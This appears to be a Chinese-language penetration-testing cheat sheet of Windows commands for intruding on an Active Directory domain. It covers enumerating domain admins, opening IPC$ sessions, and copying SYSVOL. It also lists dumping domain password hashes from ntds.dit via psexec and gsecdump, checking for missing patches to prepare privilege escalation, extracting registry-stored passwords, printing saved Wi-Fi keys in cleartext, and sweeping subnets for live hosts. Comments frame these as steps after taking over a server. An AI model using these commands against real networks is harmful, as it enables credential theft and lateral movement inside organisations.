域内資訊收集常用指令
net group /domain //獲得所有域使用者組清單
net group zzh /domain //顯示域中zzh組的成員
net group zzh /del /domain //删除域中zzh組
net group zzh andy /del /domain //删除域内zzh 群組中的成員
andy net group zzh /add /domain //增加zzh域中的群組
net group "domain admins" /domain //獲得域管理者清單
net group "enterprise admins" /domain //獲得企業管理者清單
net localgroup administrators /domain //擷取域内置administrators組用
(enterprise admins、domain admins) net group "domain controllers" /domain //獲得域控制器清單
net group "domain computers" /domain //獲得所有域成員計算機清單
net user /domain //獲得所有域使用者清單
net user someuser /domain //獲得指定賬戶someuser的詳細資訊
net accounts /domain //獲得域密碼政策設定,密碼長短,錯誤鎖定等資訊
net view /domain //查詢有幾個域, 查詢域清單
net view /domain:testdomain //檢視 testdomain域中的計算機清單
nltest /domain_trusts //擷取域信任資訊
net user domain-admin /domain //檢視管理者登陸時間,密碼過期時間,是否有登陸腳本,組配置設定等資訊
net config Workstation //查詢機器屬于哪個域
net time /domian //查詢主域伺服器的時間
echo %logonserver% //檢視登陸到這台伺服器的計算機名
net time \\192.168.50.1 //查詢遠端共享主機192.168.50.1的時間
net use \\IP\ipc$ password /user:[email protected] //ipc$域内連接配接,拿下文服的時候,可以結合菜刀去建立ipc連接配接,然後下載下傳和閱讀想要的檔案
net view \\dc1.zzhsec.com //檢視域控共享情況
dir \\dc1.zzhsec.com\SYSVOL /s /a > sysvol.txt //列出sysvol日志記錄
xcopy \\dc1.zzhsec.com\sysvol.txt sysvol.txt /i /e /c //遠端拷貝到本地sysvol日志
net user /domain zzh 123.qwe //修改域内使用者密碼,需要管理者權限
mstsc /admin //遠端桌面登入到console會話解決hash無法抓出問題
gpupdate/force //更新域政策
psexec \\192.168.50.3 -u administrator -p zzh1234 -c gsecdump.exe -u //從域伺服器密碼存儲檔案windows/ntds/ntds.dit導出hash值出來
gsecdump -a //擷取域登管理者登入過得hash值,這裡gescdump為第三方導出AD域的hash值
tasklist /S ip /U domain\username /P /V //檢視遠端計算機程序列
基本操作常用指令
ipconfig/all //檢視IP位址
ipconfig /release //釋放位址
ipconfig /renew 重新擷取Ip位址
whoami //查詢賬号所屬權限
systeminfo //查詢系統以及更新檔資訊
tasklist /svc //檢視程序
taskkill /im 程序名稱
(cmd) //結束程序
taskkill /pid[程序碼] -t(結束該程序) -f(強制結束該程序以及所有子程序)
wmic qfe get hotfixid //檢視已安裝過得更新檔,這個很實用
wmic qfe list full /format:htable > hotfixes.htm //詳細的更新檔安裝
wmic qfe //查詢更新檔資訊以及微軟提供的下載下傳位址 ping hostname(主機名) //顯示該機器名的IP
query user //檢視管理者最近登陸時間
net start //檢視目前運作的服務
net user //檢視本地組的使用者
net localhroup administrators //檢視本機管理者組有哪些使用者
net use //檢視會話
net session //檢視目前會話
net share //檢視SMB指向的路徑[即共享]
wmic share get name,path //檢視SMB指向的路徑
wmic nteventlog get path,filename,writeable //查詢系統日志檔案存儲位置
net use \\IP\ipc$ password /user:username //建立IPC會話(工作組模式)
net use z: \\192.168.50.1 //建立映射到本機Z盤
netstat -ano //檢視開放的端口
netstat -an | find “3389” //找到3389端口
net accounts //檢視本地密碼政策
nbtstat –A ip //netbiso查詢
net view //檢視機器注釋或許能得到目前活動狀态的機器清單,如果禁用netbios就檢視不出來
echo %PROCESSOR_ARCHITECTURE% //檢視系統是32還是64位 set //檢視系統環境設定變量 net start //檢視目前運作的服務
wmic service list brief //檢視程序服務
wmic process list brief //檢視程序
wmic startup list brief //檢視啟動程式資訊
wmic product list brief //檢視安裝程式和版本資訊(漏洞利用線索)
wmic startup list full //識别開機啟動的程式
wmic process where(description="mysqld.exe") >> mysql.log //擷取軟體安裝路徑
qwinsta //檢視登入情況
windows未打更新檔情況,
set KB2829361=MS13-046&set KB2830290=MS13-046&set KB2667440=MS12-020&set KB2667402=MS12-020&set KB3124280=MS16-016&set KB3077657=MS15-077&set KB3045171=MS15-051&set KB2592799=MS11-080&set KB952004=MS09-012 PR&set KB956572=MS09-012 巴西烤肉&set KB970483=MS09-020 iis6&set KB2124261=MS10-065 ii7&set KB2271195=MS10-065 ii7&systeminfo>a.txt&(for %i in (KB952004 KB956572 KB2393802 KB2503665 KB2592799 KB2621440 KB2160329 KB970483 KB2124261 KB977165 KB958644 KB2667402 KB2667440 KB2830290 KB2829361 KB3045171 KB3077657 KB3124280) do @type a.txt|@find /i "%i"||@echo %%i% Not Installed!)&del /f /q /a a.txt //windows未打更新檔情況,
為提權做準備 REG query HKCU /v "pwd" /s //擷取儲存到系統資料庫中的密碼
探索内網網絡結構指令
tracert IP //路由跟蹤
route print //列印路由表
arp -a //列出本網段内所有活躍的IP位址
arp -s (ip + MAC)//綁定mac與ip位址
arp -d (ip + MAC) //解綁mac與ip位址
nbtscan -r 192.168.16.0/24 //通過小工具nbtscan掃描整個網絡
netsh firewall show config //檢視防火牆政策
netsh firewall show state //檢視防火牆政策
查找檔案位置指令
dir /b/s config.* //檢視所在目錄所有config.為字首的檔案
dir /b/s *.config //檢視所在目錄所有config.為字尾的檔案
findstr /si password *.xml *.ini *.txt //檢視字尾名檔案中含有password關鍵字的檔案
findstr /si login *.xml *.ini *.txt //檢視字尾名檔案中含有login關鍵字的檔案
copy con ftp.bat //建立ftp.bat批處理,然後輸入ifconfig等指令,按ctr+z退出,并建立成功 copy con test.vbs //建立test.vbs腳本,輸入腳本後,按ctr+z退出,并建立成功
内網探測小腳本
//一鍵擷取wifi密碼 for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
//檢視是否支援posershell if defined PSModulePath (echo 支援powershell) else (echo 不支援powershell)
//批量掃描内網存活主機 for /l %i in (1,1,255) do @ping 10.0.0.%i -w 1 -n 1 | find /i "ttl"
//域機器對應 IP FOR /F "eol=- tokens=1 delims=\ " %a IN ('net view') DO @(echo name: %a, ip: & ping %a -w 1 -n 1 | find /i "ttl" & echo.)
//C段查找 for /l %i in (1,1,255) do @ping -a 10.0.1.%i -w 1 -n 1 | find /i "Ping"
//B段查找 for /l %i in (1,1,255) do @ping -a 10.0.%i.1 -w 1 -n 1 | find /i "Ping"
![内網安全之:Metasploit 中的端口轉發與端口映射[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)